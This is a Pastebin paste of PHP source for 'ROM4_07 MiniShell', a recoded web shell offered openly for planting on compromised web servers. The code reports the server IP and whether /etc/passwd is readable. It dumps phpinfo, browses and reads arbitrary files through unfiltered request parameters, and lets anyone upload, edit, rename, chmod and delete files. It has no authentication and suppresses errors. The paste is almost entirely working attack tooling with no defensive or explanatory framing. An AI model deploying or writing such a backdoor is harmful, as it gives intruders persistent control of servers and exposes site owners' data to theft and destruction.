RokiAdhytama

MiniShell ROM4_07 Recode From UnderTerror

May 11th, 2019
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.95 KB | None | 0 0
  1. <h1><center>ROM4_07</center></h1>
  2. <table pd width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  3. <tr><td>
  4. <center>
  5. <?php
  6. $etc_passwd = @is_readable("/etc/passwd") ? "<b><span style=\"color:white\">ON </span></b>" : "<b><span style=\"color:red\"/>off </span></b>";
  7. echo '<b><font color=red>Server IP : </b></font><b>'.$_SERVER['SERVER_ADDR'].' </b>';
  8. echo '<b><font color=red>Your IP : </b></font><b>'.$_SERVER['REMOTE_ADDR'].'</b>';
  9. echo "</br>";
  10. echo "<b><font color=red>Safe Mode : </font></b>";
  11. // Check for safe mode
  12. if( ini_get('safe_mode') ) {
  13. print '<font color=#FF0000><b> ON</b></font>';
  14. } else {
  15. print '<font color=#008000><b> OFF</b></font>';
  16. }
  17. echo "</br>";
  18. echo "<b><font color=red>Read etc/passwd : </font></b><b>$etc_passwd</b>";
  19. echo "<b><font color=red>Functions : </font><b>";echo "<a href='$php_self?p=info'>PHP INFO </a>";
  20. if(@$_GET['p']=="info"){@phpinfo();
  21. exit;}
  22. ?>
  23. <br>
  24. </center>
  25. <?
  26.  
  27. set_time_limit(0);
  28. error_reporting(0);
  29.  
  30. if(get_magic_quotes_gpc()){
  31. foreach($_POST as $key=>$value){
  32. $_POST[$key] = stripslashes($value);
  33. }
  34. }
  35. echo '<!DOCTYPE HTML>
  36. <HTML>
  37. <HEAD>
  38. <link href="" rel="stylesheet" type="text/css">
  39. <title>ROM4_07 MiniShell</title>
  40. <style>
  41. body{
  42. font-family: "Arial", cursive;
  43. background-image:url("http://i68.tinypic.com/1124ebn.jpg");
  44. color:white;
  45. text-shadow:0px 0px 1px #757575;
  46. }
  47. #content tr:hover{
  48. background-color: #636263;
  49. text-shadow:0px 0px 10px #fff;
  50. }
  51. #content .first{
  52. background-color: silver;
  53. }
  54. #content .first:hover{
  55. background-color: gray;
  56. text-shadow:0px 0px 1px #757575;
  57. }
  58. table{
  59. border: 1px #33f702 dotted;
  60. }
  61. H1{
  62. font-family: "Arial", cursive;
  63. }
  64. a{
  65. color: #33f702;
  66. text-decoration: none;
  67. }
  68. a:hover{
  69. color: #fff;
  70. text-shadow:0px 0px 10px #ffffff;
  71. }
  72. input,select,textarea{
  73. border: 1px #999999 solid;
  74. -moz-border-radius: 5px;
  75. -webkit-border-radius:5px;
  76. border-radius:5px;
  77. }
  78. </style>
  79. </HEAD>
  80. <BODY>
  81.  
  82. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  83. <tr><td>
  84. <center>
  85. <font color=red><b>Current Path : </font></b>';
  86. if(isset($_GET['y'])){
  87. $path = $_GET['y'];
  88. }else{
  89. $path = getcwd();
  90. }
  91. $path = str_replace('\\','/',$path);
  92. $paths = explode('/',$path);
  93.  
  94. foreach($paths as $id=>$pat){
  95. if($pat == '' && $id == 0){
  96. $a = true;
  97. echo '<a href="?y=/">/</a>';
  98. continue;
  99. }
  100. if($pat == '') continue;
  101. echo '<a href="?y=';
  102. for($i=0;$i<=$id;$i++){
  103. echo $paths[$i];
  104. if($i != $id) echo "/";
  105. }
  106. echo '">'.$pat.'</a>/';
  107. }
  108. echo '<a href="?"><font color=red><b>&nbsp;&nbsp;&nbsp;Home </font></b></a></td></tr><tr><td>';
  109. if(isset($_FILES['file'])){
  110. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  111. echo '<font color="#30f209">File Upload Done.</font><br />';
  112. }else{
  113. echo '<font color="red">File Upload Error.</font><br />';
  114. }
  115. }
  116. echo '<center>';
  117. echo '<form enctype="multipart/form-data" method="POST">
  118. <b><font color=red>File Upload : </b></font><input type="file" name="file" />
  119. <input type="submit" value="upload" />
  120. </form>
  121. </td></tr>';
  122. if(isset($_GET['filesrc'])){
  123. echo "<tr><td><b><center><font color=red align=center>Current File :</font></b> ";
  124. echo '<a href="?filesrc='.$path/$file.'&y='.$path.'">'.$_GET[filesrc].'</a>';
  125. echo '</tr></td></table><br />';
  126. echo('<textarea cols=90 rows=20 name="src">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  127. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  128. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  129. if($_POST['opt'] == 'chmod'){
  130. if(isset($_POST['perm'])){
  131. if(chmod($_POST['path'],$_POST['perm'])){
  132. echo '<font color="green">Change Permission Done.</font><br />';
  133. }else{
  134. echo '<font color="red">Change Permission Error.</font><br />';
  135. }
  136. }
  137. echo '<form method="POST">
  138. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  139. <input type="hidden" name="path" value="'.$_POST['path'].'">
  140. <input type="hidden" name="opt" value="chmod">
  141. <input type="submit" value="Go" />
  142. </form>';
  143. }elseif($_POST['opt'] == 'rename'){
  144. if(isset($_POST['newname'])){
  145. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  146. echo '<font color="green">Change Name Done.</font><br />';
  147. }else{
  148. echo '<font color="red">Change Name Error.</font><br />';
  149. }
  150. $_POST['name'] = $_POST['newname'];
  151. }
  152. echo '<form method="POST">
  153. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  154. <input type="hidden" name="path" value="'.$_POST['path'].'">
  155. <input type="hidden" name="opt" value="rename">
  156. <input type="submit" value="Go" />
  157. </form>';
  158. }elseif($_POST['opt'] == 'edit'){
  159. if(isset($_POST['src'])){
  160. $fp = fopen($_POST['path'],'w');
  161. if(fwrite($fp,$_POST['src'])){
  162. echo '<font color="green">Edit File Done.</font><br />';
  163. }else{
  164. echo '<font color="red">Edit File Error.</font><br />';
  165. }
  166. fclose($fp);
  167. }
  168. echo '<form method="POST">
  169. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  170. <input type="hidden" name="path" value="'.$_POST['path'].'">
  171. <input type="hidden" name="opt" value="edit">
  172. <input type="submit" value="Go" />
  173. </form>';
  174. }
  175. echo '</center>';
  176. }else{
  177. echo '</table><br /><center>';
  178. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  179. if($_POST['type'] == 'dir'){
  180. if(rmdir($_POST['path'])){
  181. echo '<font color="green">Delete Dir Done.</font><br />';
  182. }else{
  183. echo '<font color="red">Delete Dir Error.</font><br />';
  184. }
  185. }elseif($_POST['type'] == 'file'){
  186. if(unlink($_POST['path'])){
  187. echo '<font color="green">Delete File Done.</font><br />';
  188. }else{
  189. echo '<font color="red">Delete File Error.</font><br />';
  190. }
  191. }
  192. }
  193. echo '</center>';
  194. $scandir = scandir($path);
  195. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  196. <tr class="first">
  197. <td><center>Name</center></td>
  198. <td><center>Size</center></td>
  199. <td><center>Permissions</center></td>
  200. <td><center>Options</center></td>
  201. </tr>';
  202. foreach($scandir as $dir){
  203. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  204. echo "<tr>
  205. <td><a href=\"?y=$path/$dir\"><img width=33 height=44 src=\"http://icon-park.com/imagefiles/folder_icon_green.png\" />&nbsp;&nbsp;$dir</a></td>
  206. <td><center>--</center></td>
  207. <td><center>";
  208. if(is_writable("$path/$dir")) echo '<font color="#ffffff">';
  209. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  210. echo perms("$path/$dir");
  211. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  212.  
  213. echo "</center></td>
  214. <td><center><form method=\"POST\" action=\"?option&y=$path\">
  215. <select name=\"opt\">
  216. <option value=\"\"></option>
  217. <option value=\"delete\">Delete</option>
  218. <option value=\"chmod\">Chmod</option>
  219. <option value=\"rename\">Rename</option>
  220. </select>
  221. <input type=\"hidden\" name=\"type\" value=\"dir\">
  222. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  223. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  224. <input type=\"submit\" value=\">\" />
  225. </form></center></td>
  226. </tr>";
  227. }
  228. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  229. foreach($scandir as $file){
  230. if(!is_file("$path/$file")) continue;
  231. $size = filesize("$path/$file")/1024;
  232. $size = round($size,3);
  233. if($size >= 1024){
  234. $size = round($size/1024,2).' MB';
  235. }else{
  236. $size = $size.' KB';
  237. }
  238.  
  239. echo "<tr>
  240. <td><a href=\"?filesrc=$path/$file&y=$path\"><img width=33 height=44 src=\"http://icon-park.com/imagefiles/folder_icon_green.png\" />&nbsp;&nbsp;$file</a></td>
  241. <td><center>".$size."</center></td>
  242. <td><center>";
  243. if(is_writable("$path/$file")) echo '<font color="green">';
  244. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  245. echo perms("$path/$file");
  246. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  247. echo "</center></td>
  248. <td><center><form method=\"POST\" action=\"?option&y=$path\">
  249. <select name=\"opt\">
  250. <option value=\"\"></option>
  251. <option value=\"delete\">Delete</option>
  252. <option value=\"chmod\">Chmod</option>
  253. <option value=\"rename\">Rename</option>
  254. <option value=\"edit\">Edit</option>
  255. </select>
  256. <input type=\"hidden\" name=\"type\" value=\"file\">
  257. <input type=\"hidden\" name=\"name\" value=\"$file\">
  258. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  259. <input type=\"submit\" value=\">\" />
  260. </form></center></td>
  261. </tr>";
  262. }
  263. echo '</table>
  264. </div>';
  265. }
  266. echo '<br /><center>ROM4_07 MiniShell <br><font color="red">Recode From UnderTerror MiniShell</font></center>
  267. </BODY>
  268. </HTML>';
  269. function perms($file){
  270. $perms = fileperms($file);
  271.  
  272. if (($perms & 0xC000) == 0xC000) {
  273. // Socket
  274. $info = 's';
  275. } elseif (($perms & 0xA000) == 0xA000) {
  276. // Symbolic Link
  277. $info = 'l';
  278. } elseif (($perms & 0x8000) == 0x8000) {
  279. // Regular
  280. $info = '-';
  281. } elseif (($perms & 0x6000) == 0x6000) {
  282. // Block special
  283. $info = 'b';
  284. } elseif (($perms & 0x4000) == 0x4000) {
  285. // Directory
  286. $info = 'd';
  287. } elseif (($perms & 0x2000) == 0x2000) {
  288. // Character special
  289. $info = 'c';
  290. } elseif (($perms & 0x1000) == 0x1000) {
  291. // FIFO pipe
  292. $info = 'p';
  293. } else {
  294. // Unknown
  295. $info = 'u';
  296. }
  297.  
  298. // Owner
  299. $info .= (($perms & 0x0100) ? 'r' : '-');
  300. $info .= (($perms & 0x0080) ? 'w' : '-');
  301. $info .= (($perms & 0x0040) ?
  302. (($perms & 0x0800) ? 's' : 'x' ) :
  303. (($perms & 0x0800) ? 'S' : '-'));
  304.  
  305. // Group
  306. $info .= (($perms & 0x0020) ? 'r' : '-');
  307. $info .= (($perms & 0x0010) ? 'w' : '-');
  308. $info .= (($perms & 0x0008) ?
  309. (($perms & 0x0400) ? 's' : 'x' ) :
  310. (($perms & 0x0400) ? 'S' : '-'));
  311.  
  312. // World
  313. $info .= (($perms & 0x0004) ? 'r' : '-');
  314. $info .= (($perms & 0x0002) ? 'w' : '-');
  315. $info .= (($perms & 0x0001) ?
  316. (($perms & 0x0200) ? 't' : 'x' ) :
  317. (($perms & 0x0200) ? 'T' : '-'));
  318.  
  319. return $info;
  320. }
  321. ?>
Add Comment
Please, Sign In to add comment